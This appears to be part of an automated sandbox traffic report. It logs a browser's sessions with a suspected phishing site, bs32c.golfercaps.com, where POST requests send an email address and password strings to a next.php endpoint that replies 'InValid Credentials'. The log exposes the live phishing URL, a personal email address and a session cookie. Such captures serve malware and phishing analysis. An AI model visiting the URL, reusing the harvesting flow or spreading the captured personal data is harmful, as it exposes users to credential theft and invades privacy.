                                                                  Data Ascii: 25Sr1a0h_78Z4mJ07GMMD2jOcDRI9xVW_fpIjPBx7WWRBF6j1Ivj3hS4vKhXyXvXjUFfDB8084ev_xUi.DzjCCPqAnF_NILnpXoBby6TlW6y9NKbmHrIJK3kIVUwitAABurjp_omNfCy0vj3eEmdhkUHlBwzf0a8pjKb3i_xBTvOWTwpIYQhesBPluy47tFrmHcx6GVlr7qwDkSApwo2VulyGJYimUtj3B6OFh5mG6SmrSE7T.840FXwvQ5qHph
                                                                  2024-12-30 21:42:44 UTC1369INData Raw: 73 56 43 53 4f 6b 48 6b 5a 49 59 51 53 58 42 62 36 6a 79 71 58 7a 6f 46 72 6e 42 51 46 52 35 48 57 47 55 4e 6c 6f 65 55 51 48 56 50 43 42 50 51 50 35 6d 59 51 6f 69 4a 72 33 64 41 58 65 6e 6f 74 6d 75 6a 75 32 4a 56 74 62 57 68 74 39 33 32 52 78 6b 6d 79 5a 4c 2e 30 2e 61 51 65 5f 6f 36 36 54 50 4f 50 41 57 43 43 35 65 6e 54 44 59 6f 38 46 68 38 43 2e 4a 68 4c 37 46 74 33 67 6a 2e 34 65 52 4f 61 41 59 64 76 52 43 52 35 52 42 6e 70 35 39 58 7a 67 62 5f 41 57 38 6e 48 65 32 56 68 4c 59 6d 4b 30 6d 37 43 5f 53 4a 33 67 66 79 59 69 6c 47 30 79 51 55 64 52 4a 2e 59 6e 4f 74 48 4e 6b 77 42 35 61 5f 49 64 49 63 68 43 45 35 59 4c 6e 65 66 62 5a 4d 76 62 62 42 6c 76 4f 2e 49 53 57 4a 73 43 74 76 47 67 6d 47 7a 4b 34 48 58 2e 4e 77 50 37 36 78 37 65 77 63 4b 50 41
                                                                  Data Ascii: sVCSOkHkZIYQSXBb6jyqXzoFrnBQFR5HWGUNloeUQHVPCBPQP5mYQoiJr3dAXenotmuju2JVtbWht932RxkmyZL.0.aQe_o66TPOPAWCC5enTDYo8Fh8C.JhL7Ft3gj.4eROaAYdvRCR5RBnp59Xzgb_AW8nHe2VhLYmK0m7C_SJ3gfyYilG0yQUdRJ.YnOtHNkwB5a_IdIchCE5YLnefbZMvbbBlvO.ISWJsCtvGgmGzK4HX.NwP76x7ewcKPA
                                                                  2024-12-30 21:42:44 UTC652INData Raw: 73 65 61 72 63 68 20 3d 3d 3d 20 27 27 20 26 26 20 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 2e 73 6c 69 63 65 28 30 2c 20 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 2e 6c 65 6e 67 74 68 20 2d 20 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 63 4f 67 55 48 61 73 68 2e 6c 65 6e 67 74 68 29 2e 69 6e 64 65 78 4f 66 28 27 3f 27 29 20 21 3d 3d 20 2d 31 20 3f 20 27 3f 27 20 3a 20 6c 6f 63 61 74 69 6f 6e 2e 73 65 61 72 63 68 3b 69 66 20 28 77 69 6e 64 6f 77 2e 68 69 73 74 6f 72 79 20 26 26 20 77 69 6e 64 6f 77 2e 68 69 73 74 6f 72 79 2e 72 65 70 6c 61 63 65 53 74 61 74 65 29 20 7b 76 61 72 20 6f 67 55 20 3d 20 6c 6f 63 61 74 69 6f 6e 2e 70 61 74 68 6e 61 6d 65 20 2b 20 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 63 4f 67 55 51 75 65 72 79 20 2b
                                                                  Data Ascii: search === '' && location.href.slice(0, location.href.length - window._cf_chl_opt.cOgUHash.length).indexOf('?') !== -1 ? '?' : location.search;if (window.history && window.history.replaceState) {var ogU = location.pathname + window._cf_chl_opt.cOgUQuery +
                                                                  2024-12-30 21:42:44 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                  Data Ascii: 0


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  70192.168.2.458532188.114.96.3443888C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2024-12-30 21:42:53 UTC1532OUTPOST /vfd23ced/next.php HTTP/1.1
                                                                  Host: bs32c.golfercaps.com
                                                                  Connection: keep-alive
                                                                  Content-Length: 68
                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                  sec-ch-ua-mobile: ?0
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                  sec-ch-ua-arch: "x86"
                                                                  Content-Type: application/x-www-form-urlencoded; charset=UTF-8
                                                                  sec-ch-ua-full-version: "117.0.5938.132"
                                                                  Accept: application/json, text/javascript, */*; q=0.01
                                                                  sec-ch-ua-platform-version: "10.0.0"
                                                                  X-Requested-With: XMLHttpRequest
                                                                  sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"
                                                                  sec-ch-ua-bitness: "64"
                                                                  sec-ch-ua-model: ""
                                                                  sec-ch-ua-platform: "Windows"
                                                                  Origin: https://bs32c.golfercaps.com
                                                                  Sec-Fetch-Site: same-origin
                                                                  Sec-Fetch-Mode: cors
                                                                  Sec-Fetch-Dest: empty
                                                                  Referer: https://bs32c.golfercaps.com/vfd23ced/
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  Cookie: cf_clearance=xOeW0KKfp0iZa5KRDDnP4mXBed6FDPU1lH4Z5AqzKLY-1735594936-1.2.1.1-o3O3QXliRP2He8SOTXdTGMoGsrXIhAPcAxDV8KjA80qRJTcfgIy1pbQH1HVmzsC0DSDzAL4WblAI10W2tYH_CzdfOfcLutGLKHPItYPMEHhKCKgPXiGJ5hHw03eOVsB9GR84sLf_l2u_klaSlrtJYuemE4jRI354VaLvrb2noLrrHGGPSkEDalLItFz4xjiKwOTBr_I7jPPehkpllv.2lbqzwm72fRnej2IYMHnLfugiB6ClcT3590bhF5qpOkqYmTia8XOQpnUb2S5O_g7QSE07uFo9DlgiPUzktcx_Z9L9oqyrXgIIjsJOUqdJLGe7dnvCFYMKzCBdEGGYc.TZNlnfh_a79c9sUzGWD5yxJ0skl8ELLHXkxwllXJcMDhG4rRvhmp7t6zZmqVb.2Ad0DrVIPYYeM2imt2dWd7K6ZdU
                                                                  2024-12-30 21:42:53 UTC68OUTData Raw: 61 69 3d 73 65 61 6e 25 34 30 76 69 72 74 75 61 6c 69 6e 74 65 6c 6c 69 67 65 6e 63 65 62 72 69 65 66 69 6e 67 2e 63 6f 6d 26 70 72 3d 42 79 4b 25 33 41 37 5f 37 46 2e 25 33 46 47 67 4c 38 25 32 35 29 4a
                                                                  Data Ascii: ai=sean%40virtualintelligencebriefing.com&pr=ByK%3A7_7F.%3FGgL8%25)J
                                                                  2024-12-30 21:42:53 UTC804INHTTP/1.1 200 OK
                                                                  Date: Mon, 30 Dec 2024 21:42:53 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: close
                                                                  cf-cache-status: DYNAMIC
                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xVBC86nZsJ8RKVtHuIQa5vgiZimAmzZkRDmOVAk1%2BBQ5PV%2BdHx0Ebqxu3dHHmGsltsLrba1mElebv%2BC%2BOCHOdsGRdjFM9rpeiQngg99PXFIWJ3Spp50LA24a3o4SAAn8T%2FX9g%2F3TUQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                  Server: cloudflare
                                                                  CF-RAY: 8fa533c6bf7cc33b-EWR
                                                                  alt-svc: h3=":443"; ma=86400
                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1543&min_rtt=1533&rtt_var=596&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2834&recv_bytes=2222&delivery_rate=1802469&cwnd=171&unsent_bytes=0&cid=131b56098f7da3c3&ts=607&x=0"
                                                                  2024-12-30 21:42:53 UTC94INData Raw: 35 38 0d 0a 7b 22 73 69 67 6e 61 6c 22 3a 22 6f 6b 22 2c 22 6d 73 67 22 3a 22 49 6e 56 61 6c 69 64 20 43 72 65 64 65 6e 74 69 61 6c 73 22 2c 22 72 65 64 69 72 65 63 74 5f 6c 69 6e 6b 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 5c 2f 22 7d 0d 0a
                                                                  Data Ascii: 58{"signal":"ok","msg":"InValid Credentials","redirect_link":"https:\/\/www.google.com\/"}
                                                                  2024-12-30 21:42:53 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                  Data Ascii: 0


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  71192.168.2.458534188.114.97.3443888C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2024-12-30 21:42:54 UTC361OUTGET /vfd23ced/next.php HTTP/1.1
                                                                  Host: bs32c.golfercaps.com
                                                                  Connection: keep-alive
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                  Accept: */*
                                                                  Sec-Fetch-Site: none
                                                                  Sec-Fetch-Mode: cors
                                                                  Sec-Fetch-Dest: empty
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  2024-12-30 21:42:54 UTC1285INHTTP/1.1 403 Forbidden
                                                                  Date: Mon, 30 Dec 2024 21:42:54 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: close
                                                                  Accept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                                                  Critical-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                                                  Cross-Origin-Embedder-Policy: require-corp
                                                                  Cross-Origin-Opener-Policy: same-origin
                                                                  Cross-Origin-Resource-Policy: same-origin
                                                                  Origin-Agent-Cluster: ?1
                                                                  Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                                                  Referrer-Policy: same-origin
                                                                  X-Content-Options: nosniff
                                                                  X-Frame-Options: SAMEORIGIN
                                                                  cf-mitigated: challenge
                                                                  2024-12-30 21:42:54 UTC916INData Raw: 63 66 2d 63 68 6c 2d 6f 75 74 3a 20 6b 6b 6a 61 37 55 69 4e 71 30 7a 6d 58 49 32 2b 6b 52 42 69 74 61 4f 37 4f 77 55 54 44 39 66 2b 37 6e 50 36 34 46 46 37 4d 31 30 62 39 6e 61 6d 4f 7a 30 68 44 36 73 36 62 76 69 37 55 34 78 43 6d 43 56 66 35 6a 78 65 4d 42 67 30 64 33 66 78 72 4c 2b 6c 69 67 33 65 4d 47 55 56 6a 49 75 47 2b 4e 34 73 57 52 47 59 6f 76 38 3d 24 5a 73 63 47 4d 7a 4e 74 78 73 7a 59 42 48 62 4a 77 30 45 64 2b 77 3d 3d 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 70 72 69 76 61 74 65 2c 20 6d 61 78 2d 61 67 65 3d 30 2c 20 6e 6f 2d 73 74 6f 72 65 2c 20 6e 6f 2d 63 61 63 68 65 2c 20 6d 75 73 74 2d 72 65 76 61 6c 69 64 61 74 65 2c 20 70 6f 73 74 2d 63 68 65 63 6b 3d 30 2c 20 70 72 65 2d 63 68 65 63 6b 3d 30 0d 0a 45 78 70 69 72 65 73 3a 20
                                                                  Data Ascii: cf-chl-out: kkja7UiNq0zmXI2+kRBitaO7OwUTD9f+7nP64FF7M10b9namOz0hD6s6bvi7U4xCmCVf5jxeMBg0d3fxrL+lig3eMGUVjIuG+N4sWRGYov8=$ZscGMzNtxszYBHbJw0Ed+w==Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires:
                                                                  2024-12-30 21:42:54 UTC1369INData Raw: 32 32 35 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4a 75 73 74 20 61 20 6d 6f 6d 65 6e 74 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 6e 6f 66 6f 6c 6c 6f 77 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d
                                                                  Data Ascii: 225d<!DOCTYPE html><html lang="en-US"><head><title>Just a moment...</title><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=Edge"><meta name="robots" content="noindex,nofollow"><meta name=
                                                                  2024-12-30 21:42:54 UTC1369INData Raw: 75 4d 7a 67 34 4c 6a 51 77 4e 79 34 7a 4f 44 6b 75 4e 44 41 33 4c 6a 6b 35 4e 43 41 77 49 43 34 31 4f 54 59 74 4c 6a 51 77 4e 79 34 35 4f 44 51 74 4c 6a 4d 35 4e 79 34 7a 4f 53 30 78 4c 6a 41 31 4e 79 34 7a 4f 44 6b 74 4c 6a 59 31 49 44 41 74 4d 53 34 77 4e 54 59 74 4c 6a 4d 34 4f 53 30 75 4d 7a 6b 34 4c 53 34 7a 4f 44 6b 74 4c 6a 4d 35 4f 43 30 75 4f 54 67 30 49 44 41 74 4c 6a 55 35 4e 79 34 7a 4f 54 67 74 4c 6a 6b 34 4e 53 34 30 4d 44 59 74 4c 6a 4d 35 4e 79 41 78 4c 6a 41 31 4e 69 30 75 4d 7a 6b 33 49 69 38 2b 50 43 39 7a 64 6d 63 2b 29 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 72 65 70 65 61 74 3a 6e 6f 2d 72 65 70 65 61 74 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 73 69 7a 65 3a 63 6f 6e 74 61 69 6e 3b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 33 34 70 78 7d 40 6d
                                                                  Data Ascii: uMzg4LjQwNy4zODkuNDA3Ljk5NCAwIC41OTYtLjQwNy45ODQtLjM5Ny4zOS0xLjA1Ny4zODktLjY1IDAtMS4wNTYtLjM4OS0uMzk4LS4zODktLjM5OC0uOTg0IDAtLjU5Ny4zOTgtLjk4NS40MDYtLjM5NyAxLjA1Ni0uMzk3Ii8+PC9zdmc+);background-repeat:no-repeat;background-size:contain;padding-left:34px}@m
                                                                  2024-12-30 21:42:54 UTC1369INData Raw: 6b 75 35 4d 4e 32 4d 48 31 61 4f 4b 33 76 38 53 41 4f 32 6b 58 71 67 4e 6b 49 52 65 72 37 44 77 4e 68 62 4d 45 6c 46 72 69 2e 37 75 59 68 4f 44 37 7a 41 2e 36 55 68 37 7a 54 62 4f 42 4d 48 4f 75 34 57 30 2e 43 66 5a 41 76 6c 42 42 4c 35 58 68 6f 54 74 76 54 56 58 64 6c 62 6d 34 57 48 2e 55 71 63 6b 61 54 54 68 62 55 70 55 78 49 59 53 42 71 67 42 74 4a 34 56 79 4d 52 36 67 58 4e 66 36 32 52 32 6d 6a 73 69 5f 5a 4b 59 33 70 65 5f 31 36 4b 4b 73 56 76 6c 65 67 71 6b 34 6c 4b 77 52 32 56 70 73 5a 75 4e 6c 64 5f 5f 5f 31 4a 53 69 63 52 6d 33 33 4f 45 4b 70 42 6b 51 6a 41 34 6b 53 78 65 35 77 76 56 49 48 48 6e 35 65 38 6b 55 42 50 66 4a 4c 6d 79 77 64 31 57 53 78 4c 46 73 4d 79 52 61 7a 50 71 38 52 44 6e 72 6a 2e 38 39 42 49 7a 5a 64 4f 6d 6e 37 69 6b 53 55 73
                                                                  Data Ascii: ku5MN2MH1aOK3v8SAO2kXqgNkIRer7DwNhbMElFri.7uYhOD7zA.6Uh7zTbOBMHOu4W0.CfZAvlBBL5XhoTtvTVXdlbm4WH.UqckaTThbUpUxIYSBqgBtJ4VyMR6gXNf62R2mjsi_ZKY3pe_16KKsVvlegqk4lKwR2VpsZuNld___1JSicRm33OEKpBkQjA4kSxe5wvVIHHn5e8kUBPfJLmywd1WSxLFsMyRazPq8RDnrj.89BIzZdOmn7ikSUs
                                                                  2024-12-30 21:42:54 UTC1369INData Raw: 67 36 39 52 6d 35 56 59 75 30 31 43 69 6b 59 71 55 66 33 78 35 72 47 73 4b 59 2e 39 42 6a 37 69 39 41 4a 43 42 4a 78 49 75 4c 73 35 45 4d 75 71 79 33 35 6e 4f 57 37 5f 73 4f 79 31 57 54 4f 73 30 51 65 61 75 61 66 6d 4d 7a 4d 35 48 34 4e 49 35 54 6e 74 42 32 6d 53 78 73 79 46 65 41 79 6a 74 35 6c 49 33 53 52 44 79 4f 49 76 43 4a 6b 63 38 5f 4f 6c 44 50 36 68 75 31 59 52 56 4e 76 58 6f 6e 6f 4a 63 57 67 46 74 55 53 47 4c 76 5f 4b 57 66 6e 62 78 76 4c 34 2e 30 56 57 4d 69 6f 48 66 48 42 38 5f 5a 31 6d 39 5a 66 61 75 4b 4b 6f 48 7a 4d 77 30 54 55 42 75 42 54 38 65 63 5f 34 31 43 5f 64 77 41 32 65 67 4e 47 77 74 2e 34 44 4a 55 70 77 4a 6b 46 32 53 6c 46 34 39 64 74 73 43 6b 32 4b 36 7a 64 61 44 51 71 65 6c 39 4a 6d 35 4b 65 31 62 32 61 6a 47 70 68 41 31 58 30
                                                                  Data Ascii: g69Rm5VYu01CikYqUf3x5rGsKY.9Bj7i9AJCBJxIuLs5EMuqy35nOW7_sOy1WTOs0QeauafmMzM5H4NI5TntB2mSxsyFeAyjt5lI3SRDyOIvCJkc8_OlDP6hu1YRVNvXonoJcWgFtUSGLv_KWfnbxvL4.0VWMioHfHB8_Z1m9ZfauKKoHzMw0TUBuBT8ec_41C_dwA2egNGwt.4DJUpwJkF2SlF49dtsCk2K6zdaDQqel9Jm5Ke1b2ajGphA1X0
                                                                  2024-12-30 21:42:54 UTC1369INData Raw: 62 72 42 6f 43 33 69 41 72 51 78 56 30 64 75 33 41 57 53 75 68 78 42 58 6a 76 70 61 51 44 4a 53 5a 78 6d 77 68 37 31 78 62 72 6a 43 51 48 6a 44 33 4c 2e 72 38 6a 30 31 46 70 73 6f 7a 4c 72 6f 34 42 70 4f 6b 78 6c 4f 39 41 6d 49 44 6c 6c 67 49 59 36 53 38 4e 4f 35 4c 61 75 6d 6f 38 4f 6a 32 75 68 53 4b 31 54 67 6c 56 50 4a 31 67 4a 5f 46 50 54 4b 58 6b 32 38 6a 48 67 7a 35 4e 68 45 66 79 30 55 6d 2e 61 6e 61 59 34 6a 64 4f 6d 31 68 53 35 6a 59 2e 2e 51 6d 36 64 4a 53 53 73 45 37 54 56 6a 64 55 4b 54 65 33 64 55 58 6f 55 6a 4b 42 62 57 64 49 42 54 74 30 6b 79 65 74 37 38 58 76 7a 5f 54 41 5f 46 4e 52 42 64 44 35 36 4b 41 4d 73 72 43 48 4a 55 42 41 39 71 4c 75 72 48 72 7a 76 76 71 4f 38 48 6b 30 35 53 6f 57 79 78 48 48 4a 54 76 57 54 72 55 6e 68 43 42 78 63
                                                                  Data Ascii: brBoC3iArQxV0du3AWSuhxBXjvpaQDJSZxmwh71xbrjCQHjD3L.r8j01FpsozLro4BpOkxlO9AmIDllgIY6S8NO5Laumo8Oj2uhSK1TglVPJ1gJ_FPTKXk28jHgz5NhEfy0Um.anaY4jdOm1hS5jY..Qm6dJSSsE7TVjdUKTe3dUXoUjKBbWdIBTt0kyet78Xvz_TA_FNRBdD56KAMsrCHJUBA9qLurHrzvvqO8Hk05SoWyxHHJTvWTrUnhCBxc
                                                                  2024-12-30 21:42:54 UTC1369INData Raw: 75 66 66 38 56 7a 35 5f 4b 45 59 53 55 4e 4c 44 42 34 63 43 72 6e 32 34 4e 68 42 30 43 77 74 66 54 32 33 58 56 37 2e 42 5a 46 44 6f 65 45 50 36 69 4e 62 53 51 4a 6e 5a 6b 5a 36 59 44 35 33 42 41 6d 77 58 59 77 66 43 2e 64 67 6f 4c 6d 78 71 74 75 73 33 44 76 30 4f 53 4a 42 4e 47 75 6d 76 4d 6f 69 35 42 34 63 31 2e 6b 49 45 66 4b 54 73 43 4b 38 79 44 45 63 73 70 78 34 42 4a 4c 70 75 78 5a 6a 56 38 36 5a 75 51 71 47 35 78 39 33 61 33 47 78 6f 4f 4c 5a 42 74 6e 2e 4a 6a 65 58 75 73 54 47 70 57 66 78 48 75 78 79 30 4d 31 65 6f 44 4b 34 53 30 57 51 73 30 47 55 68 71 64 5a 57 41 6d 37 66 45 42 45 52 32 37 48 71 63 32 65 52 65 79 55 71 74 71 31 77 77 64 67 50 5a 30 37 62 56 67 62 56 6e 65 4c 45 71 30 6f 68 56 31 71 44 6d 6a 63 57 4b 45 4b 46 65 4e 61 43 45 38 31
                                                                  Data Ascii: uff8Vz5_KEYSUNLDB4cCrn24NhB0CwtfT23XV7.BZFDoeEP6iNbSQJnZkZ6YD53BAmwXYwfC.dgoLmxqtus3Dv0OSJBNGumvMoi5B4c1.kIEfKTsCK8yDEcspx4BJLpuxZjV86ZuQqG5x93a3GxoOLZBtn.JjeXusTGpWfxHuxy0M1eoDK4S0WQs0GUhqdZWAm7fEBER27Hqc2eReyUqtq1wwdgPZ07bVgbVneLEq0ohV1qDmjcWKEKFeNaCE81
                                                                  2024-12-30 21:42:54 UTC591INData Raw: 65 6e 67 74 68 20 2d 20 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 63 4f 67 55 48 61 73 68 2e 6c 65 6e 67 74 68 29 2e 69 6e 64 65 78 4f 66 28 27 3f 27 29 20 21 3d 3d 20 2d 31 20 3f 20 27 3f 27 20 3a 20 6c 6f 63 61 74 69 6f 6e 2e 73 65 61 72 63 68 3b 69 66 20 28 77 69 6e 64 6f 77 2e 68 69 73 74 6f 72 79 20 26 26 20 77 69 6e 64 6f 77 2e 68 69 73 74 6f 72 79 2e 72 65 70 6c 61 63 65 53 74 61 74 65 29 20 7b 76 61 72 20 6f 67 55 20 3d 20 6c 6f 63 61 74 69 6f 6e 2e 70 61 74 68 6e 61 6d 65 20 2b 20 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 63 4f 67 55 51 75 65 72 79 20 2b 20 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 63 4f 67 55 48 61 73 68 3b 68 69 73 74 6f 72 79 2e 72 65 70 6c 61 63 65 53 74 61 74 65 28 6e 75 6c 6c 2c
                                                                  Data Ascii: ength - window._cf_chl_opt.cOgUHash.length).indexOf('?') !== -1 ? '?' : location.search;if (window.history && window.history.replaceState) {var ogU = location.pathname + window._cf_chl_opt.cOgUQuery + window._cf_chl_opt.cOgUHash;history.replaceState(null,
                                                                  2024-12-30 21:42:54 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                  Data Ascii: 0


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  72192.168.2.458556188.114.96.3443888C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2024-12-30 21:43:05 UTC1532OUTPOST /vfd23ced/next.php HTTP/1.1
                                                                  Host: bs32c.golfercaps.com
                                                                  Connection: keep-alive
                                                                  Content-Length: 66
                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                  sec-ch-ua-mobile: ?0
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                  sec-ch-ua-arch: "x86"
                                                                  Content-Type: application/x-www-form-urlencoded; charset=UTF-8
                                                                  sec-ch-ua-full-version: "117.0.5938.132"
                                                                  Accept: application/json, text/javascript, */*; q=0.01
                                                                  sec-ch-ua-platform-version: "10.0.0"
                                                                  X-Requested-With: XMLHttpRequest
                                                                  sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"
                                                                  sec-ch-ua-bitness: "64"
                                                                  sec-ch-ua-model: ""
                                                                  sec-ch-ua-platform: "Windows"
                                                                  Origin: https://bs32c.golfercaps.com
                                                                  Sec-Fetch-Site: same-origin
                                                                  Sec-Fetch-Mode: cors
                                                                  Sec-Fetch-Dest: empty
                                                                  Referer: https://bs32c.golfercaps.com/vfd23ced/
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  Cookie: cf_clearance=xOeW0KKfp0iZa5KRDDnP4mXBed6FDPU1lH4Z5AqzKLY-1735594936-1.2.1.1-o3O3QXliRP2He8SOTXdTGMoGsrXIhAPcAxDV8KjA80qRJTcfgIy1pbQH1HVmzsC0DSDzAL4WblAI10W2tYH_CzdfOfcLutGLKHPItYPMEHhKCKgPXiGJ5hHw03eOVsB9GR84sLf_l2u_klaSlrtJYuemE4jRI354VaLvrb2noLrrHGGPSkEDalLItFz4xjiKwOTBr_I7jPPehkpllv.2lbqzwm72fRnej2IYMHnLfugiB6ClcT3590bhF5qpOkqYmTia8XOQpnUb2S5O_g7QSE07uFo9DlgiPUzktcx_Z9L9oqyrXgIIjsJOUqdJLGe7dnvCFYMKzCBdEGGYc.TZNlnfh_a79c9sUzGWD5yxJ0skl8ELLHXkxwllXJcMDhG4rRvhmp7t6zZmqVb.2Ad0DrVIPYYeM2imt2dWd7K6ZdU
                                                                  2024-12-30 21:43:05 UTC66OUTData Raw: 61 69 3d 73 65 61 6e 25 34 30 76 69 72 74 75 61 6c 69 6e 74 65 6c 6c 69 67 65 6e 63 65 62 72 69 65 66 69 6e 67 2e 63 6f 6d 26 70 72 3d 50 6a 25 32 35 67 67 49 66 25 33 45 35 56 25 35 42 25 37 44 4b
                                                                  Data Ascii: ai=sean%40virtualintelligencebriefing.com&pr=Pj%25ggIf%3E5V%5B%7DK
                                                                  2024-12-30 21:43:05 UTC792INHTTP/1.1 200 OK
                                                                  Date: Mon, 30 Dec 2024 21:43:05 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: close
                                                                  cf-cache-status: DYNAMIC
                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jPIXxCltmBBULJ8FBX8OjyVqWbtk2qN9bijXNg4yLfjXVpVPcNycE0evqGnrECwDMlXOmH3BTWAJrErXBuBko38dsZAcElM1tdtUxErpLnCtwXLOEQPUOT6moAx1QQMGhSQg6PA8bA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                  Server: cloudflare
                                                                  CF-RAY: 8fa534111d1143b8-EWR
                                                                  alt-svc: h3=":443"; ma=86400
                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1610&min_rtt=1604&rtt_var=606&sent=4&recv=7&lost=0&retrans=0&sent_bytes=2833&recv_bytes=2220&delivery_rate=1820448&cwnd=231&unsent_bytes=0&cid=a94a0dc3b634cd63&ts=489&x=0"
                                                                  2024-12-30 21:43:05 UTC94INData Raw: 35 38 0d 0a 7b 22 73 69 67 6e 61 6c 22 3a 22 6f 6b 22 2c 22 6d 73 67 22 3a 22 49 6e 56 61 6c 69 64 20 43 72 65 64 65 6e 74 69 61 6c 73 22 2c 22 72 65 64 69 72 65 63 74 5f 6c 69 6e 6b 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 5c 2f 22 7d 0d 0a
                                                                  Data Ascii: 58{"signal":"ok","msg":"InValid Credentials","redirect_link":"https:\/\/www.google.com\/"}
                                                                  2024-12-30 21:43:05 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                  Data Ascii: 0


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
